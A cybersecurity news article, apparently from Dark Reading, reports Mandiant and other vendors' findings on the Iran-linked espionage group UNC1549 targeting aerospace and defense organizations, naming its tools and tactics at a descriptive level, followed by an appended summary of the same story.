Iran-Nexus Threat Actor UNC1549 Takes Aim at Aerospace TechTarget and Informa Tech’s Digital Business Combine.TechTarget and InformaTechTarget and Informa Tech’s Digital Business Combine.Together, we power an unparalleled network of 220+ online properties covering 10,000+ granular topics, serving an audience of 50+ million professionals with original, objective content from trusted sources. We help you gain critical insights and make more informed decisions across your business priorities.Dark Reading Resource LibraryBlack Hat NewsOmdia CybersecurityAdvertiseNewsletter Sign-UpNewsletter Sign-UpCybersecurity TopicsRelated TopicsApplication SecurityCybersecurity CareersCloud SecurityCyber RiskCyberattacks & Data BreachesCybersecurity AnalyticsCybersecurity OperationsData PrivacyEndpoint SecurityICS/OT SecurityIdentity & Access Mgmt SecurityInsider ThreatsIoTMobile SecurityPerimeterPhysical SecurityRemote WorkforceThreat IntelligenceVulnerabilities & ThreatsRecent in Cybersecurity TopicsCybersecurity OperationsCan a Global, Decentralized System Save CVE Data?Can a Global, Decentralized System Save CVE Data?byRobert Lemos, Contributing WriterNov 18, 20254 Min ReadApplication SecurityMalicious Npm Packages Abuse Adspect Cloaking in Crypto ScamMalicious Npm Packages Abuse Adspect Cloaking in Crypto ScambyElizabeth Montalbano, Contributing WriterNov 18, 20255 Min ReadWorld Related TopicsDR GlobalMiddle East & AfricaAsia PacificRecent in World See AllCyberattacks & Data BreachesCoyote, Maverick Banking Trojans Run Rampant in BrazilCoyote, Maverick Banking Trojans Run Rampant in BrazilbyAlexander CulafiNov 13, 20254 Min ReadThreat IntelligenceSilver Fox APT Blurs the Line Between Espionage & CybercrimeSilver Fox APT Blurs the Line Between Espionage & CybercrimebyNate Nelson, Contributing WriterAug 8, 20253 Min ReadThe EdgeDR TechnologyEventsRelated TopicsUpcoming EventsPodcastsWebinarsSEE ALLResourcesRelated TopicsResource LibraryNewslettersPodcastsReportsVideosWebinarsWhite Papers Partner PerspectivesDark Reading Resource LibraryCybersecurity OperationsEndpoint SecurityThreat IntelligenceCyberattacks & Data BreachesNewsIran-Nexus Threat Actor UNC1549 Takes Aim at AerospaceResearchers say Israel remains a central focus, with UNC1549 targeting aerospace and defense entities in the US, the UAE, Qatar, Spain, and Saudi Arabia.Alexander Culafi, Senior News Writer, Dark ReadingNovember 18, 20255 Min ReadSource: Sylvain Oliveira via Alamy Stock PhotoAn Iran-nexus threat actor known for espionage has been targeting organizations in the aerospace sector.Researchers for Google Cloud's Mandiant said as much in a Nov. 17 blog post dedicated to a threat actor tracked as UNC1549. Google previously reported on the actor, which is thought to overlap with Iranian Revolutionary Guard Corps (IRGC)-linked group Tortoiseshell, early last year. At the time, Mandiant reported the group was compromising systems at aerospace and defense firms across multiple countries, including Israel and the United Arab Emirates.In Mandiant's latest blog post, researchers cover tactics, techniques, and procedures (TTPs) observed in incidents attributed to UNC1549 Mandiant has responded to since mid-2024. Google's Larsen says that while Israel remains a central focus, UNC1549's targeting has expanded to include more organizations in US, the UAE, Qatar, Spain, and Saudi Arabia. "We are seeing a broadening of their operational scope beyond just direct military rivals. They are targeting sectors like technology, hospitality, and transportation, often using those intrusions to leverage trusted relationships and hop into their ultimate targets in the aerospace and defense sectors," he explains.Adam Meyers, CrowdStrike's senior vice president of counter adversary, tells Dark Reading that in the case of this threat actor in particular (which CrowdStrike tracks as "Imperial Kitten"), the security vendor has seen it expand its infrastructure and ramp up espionage activity in alignment with the interests of the IRGC since this past summer. Related:Cloud Break: IoT Devices Open to Silent Takeover Via Firewalls"Their campaigns often use job-themed phishing lures to compromise victims and deliver malicious payloads. Previous operations have targeted Western countries, as well as Israel, Saudi Arabia, and the UAE, with a wide range of industries in scope — including defense, hospitality, finance, transportation, and technology."ESET senior threat intelligence analyst Adam Burgher, meanwhile, says ESET has observed the actor (which it calls "GalaxyGato") targeting Israel and Greece for the past six months.The US Department of Homeland Security warned in June that Iranian threat actors or hacktivists could target US-based critical infrastructure operators. And in recent months, Iran-linked attackers have conducted a wide range of threat campaigns targeting everything from Europe to telecommunications firms. UNC1549's Continued Onslaught Against AerospaceMandiant's post, authored by Mohamed El-Banna, Daniel Lee, Mike Stokkel, and Josh Goddard, asserts that since the middle of last year, UNC1549 has targeted organizations in aerospace, aviation, and defense using a sophisticated approach.Related:Can a Global, Decentralized System Save CVE Data?Sometimes, attackers would craft spear-phishing attacks designed to steal credentials or deliver malware to the target. Other times, UNC1549 would first compromise a third-party supplier or business partner and then exploit that trust to go after the main target. "The latter technique is particularly strategic when targeting organizations with high security maturity, such as defense contractors. While these primary targets often invest heavily in robust defenses, their third-party partners may possess less stringent security postures," the blog post read. "This disparity provides UNC1549 a path of lesser resistance, allowing them to circumvent the primary target's main security controls by first compromising a connected entity."The actor also uses sophisticated post-exploitation tactics, such as stealing source code to use for lookalike domains in future spear-phishing campaigns and abusing service ticketing systems to trick employees into giving up sensitive credentials. Additionally, UNC1549 would use a series of custom tools both to open backdoors and to maintain persistence. Some tools the research highlighted include a C++ backdoor for communicating with command-and-control (C2) infrastructure tracked as Twostroke; custom tunneller Lightrail; shell command executor, system info enumerator, and file manager Deeproot; and a tool named DCSyncer.Slick, which mimics the legitimate DCSync Active Directory replication feature in order to "extract NTLM password hashes directly from the domain controllers," Mandiant wrote.Related:Bug Bounty Programs Rise as Key Strategic Security SolutionsTo avoid defenses, attackers would delete utilities and other forensic artifacts. They also "repeatedly used SSH reverse tunnels from victim hosts back to their infrastructure, a technique that helped hide their activity from [endpoint detection and response] agents installed on those systems."Why UNC1549 Targets AerospaceAlthough Iran targets many sectors and areas of the world to further its geopolitical interests, it is notable that Mandiant's tracking of UNC1549 involves campaigns targeting a narrow range of verticals. The post's authors stated that the threat actor's operations appear "strongly motivated by espionage," citing extensive data collection from victim networks. Google saw UNC1549 steal sensitive information such as emails, network and IT documentation, and intellectual property.Austin Larsen, principal threat analyst for the Google Threat Intelligence Group, tells Dark Reading that the threat actor seems primarily motivated by strategic intelligence gathering rather than something like destructive pre-positioning. While their actions point to a goal of acquiring proprietary and military secrets, Larsen says another major goal is to use compromised aerospace and defense firms as a vehicle to target other valuable organizations."A major driver for targeting this specific vertical is the ability to use these organizations as pivot points. We see them exploiting trusted connections with third-party suppliers to reach high-value targets, often compromising smaller vendors to bypass the robust defenses of major defense contractors," Larson says. On the military intelligence front, Jeremy Makowski, senior security researcher at Rapid7, says aerospace organizations are especially valuable to Iran because gained intel can "significantly speed up progress in areas where Tehran struggles to legally obtain advanced technology.""Militarily, it helps compensate for an outdated air force and limited access to modern aircraft. Information on propulsion, radar systems, satellite technologies, and precision-guidance components directly benefits Iran's expanding missile and drone programs, fields where even minor improvements can shift the strategic balance. But the value isn't purely military," he says. "Aerospace espionage enables Iran to identify restricted components, track global suppliers, and circumvent sanctions through covert procurement networks. It also supports political objectives by showcasing technological advancement to domestic audiences, signaling deterrence abroad, and equipping regional proxy groups with more capable systems."About the AuthorAlexander CulafiSenior News Writer, Dark ReadingAlex is an award-winning writer, journalist, and podcast host based in Boston. After cutting his teeth writing for independent gaming publications as a teenager, he graduated from Emerson College in 2016 with a Bachelor of Science in journalism. He has previously been published on VentureFizz, Search Security, Nintendo World Report, and elsewhere. In his spare time, Alex hosts the weekly Nintendo podcast Talk Nintendo Podcast and works on personal writing projects, including two previously self-published science fiction novels.See more from Alexander CulafiMore InsightsIndustry Reports2025 State of Threat Intelligence: What it means for your cybersecurity strategyGartner Innovation Insight: AI SOC AgentsState of AI and Automation in Threat IntelligenceGuide to Network Analysis Visibility SolutionsOrganizations Require a New Approach to Handle Investigation and Response in the CloudAccess More ResearchWebinarsIdentity Security in the Agentic AI EraHow AI & Autonomous Patching Eliminate Exposure RisksSecuring the Hybrid Workforce: Challenges and SolutionsCybersecurity Outlook 2026Threat Hunting Tools & Techniques for Staying Ahead of Cyber AdversariesMore WebinarsYou May Also LikeEditor's ChoiceVulnerabilities & Threats'CitrixBleed 2' Wreaks Havoc as Zero-Day Bug'CitrixBleed 2' Wreaks Havoc as Zero-Day BugbyJai Vijayan, Contributing WriterNov 12, 20255 Min ReadKeep up with the latest cybersecurity threats, newly discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.SubscribeWebinarsIdentity Security in the Agentic AI EraTues, Dec 9, 2025 at 1pm ESTHow AI & Autonomous Patching Eliminate Exposure RisksOn-DemandSecuring the Hybrid Workforce: Challenges and SolutionsTues, Nov 4, 2025 at 1pm ESTCybersecurity Outlook 2026Virtual Event | December 3rd, 2025 | 11:00am - 5:20pm ET | Doors Open at 10:30am ETThreat Hunting Tools & Techniques for Staying Ahead of Cyber AdversariesTuesday, Oct 21, 2025 at 1pm ESTMore WebinarsWhite PapersMissing 88% of Exploits: Rethinking KEV in the AI EraThe Straightforward Buyer's Guide to EDRThe True Cost of a Cyberattack - 2025 EditionHow to be a Better Threat HunterFrom the C-Suite to the SOC: Consolidating the Network Security SolutionsExplore More White PapersDiscover MoreBlack HatOmdiaWorking With UsAbout UsAdvertiseReprintsJoin UsNewsletter Sign-UpFollow UsCopyright © 2025 TechTarget, Inc. d/b/a Informa TechTarget. This website is owned and operated by Informa TechTarget, part of a global network that informs, influences and connects the world’s technology buyers and sellers. All copyright resides with them. Informa PLC’s registered office is 5 Howick Place, London SW1P 1WG. Registered in England and Wales. TechTarget, Inc.’s registered office is 275 Grove St. Newton, MA 02466.Home|Cookie Policy|Privacy|Terms of Use

UNC1549, an Iran-nexus threat actor, has significantly expanded its targeting beyond Israel to encompass a broader range of aerospace and defense entities globally. As detailed by Google Cloud’s Mandiant, the actor, previously tracked as Tortoiseshell, has been actively engaged in espionage activities since mid-2024, with a primary motivation focused on strategic intelligence gathering. Initially concentrated on targets in Israel and the United Arab Emirates, UNC1549’s operations have broadened to include the US, Qatar, Spain, and Saudi Arabia.

Researchers observed a sophisticated TTPs employed by the group, including spear-phishing campaigns targeting credentials, leveraging third-party suppliers to compromise primary defense contractors, and utilizing custom tools like Twostroke (a C++ backdoor), Lightrail (a tunneller), Deeproot (a shell command executor), and DCSyncer (mimicking Active Directory replication to exfiltrate NTLM password hashes). To avoid detection, the group employed tactics such as deleting forensic artifacts and establishing SSH reverse tunnels.

The motivations behind UNC1549's sustained targeting of the aerospace sector are multi-faceted. According to Google’s analysis, the primary driver is strategic intelligence – collecting sensitive data like emails, network documentation, and intellectual property. However, Mandiant’s tracking reveals a secondary goal: utilizing compromised aerospace and defense firms as pivot points to reach higher-value targets, particularly those involved in military technology.

Jeremy Makowski, a senior security researcher at Rapid7, highlighted that aerospace organizations are particularly valuable to Iran due to the intelligence gained, which can "significantly speed up progress in areas where Tehran struggles to legally obtain advanced technology." Specifically, gaining insights into propulsion systems, radar technology, satellite technologies, and precision-guidance components directly benefits Iran’s missile and drone programs. Beyond military applications, the espionage also helps Iran circumvent sanctions by identifying restricted components, tracking global suppliers, and creating covert procurement networks.

The group’s tactics reflect a deliberate strategy to exploit trust relationships. As outlined by Austin Larsen, Principal Threat Analyst for the Google Threat Intelligence Group, UNC1549 utilizes these connections to “pivot” – leveraging trusted third-party suppliers to bypass the robust defenses of major defense contractors. This approach effectively allows them to circumvent defensive layers.

Ultimately, UNC1549’s actions underscore the geopolitical significance of the aerospace sector and the ongoing strategic competition between nations. The threat actor's continued operation demonstrates Iran's commitment to information gathering and technological advancement, highlighting the necessity for organizations within the aerospace and defense industries to meticulously assess and bolster their security postures.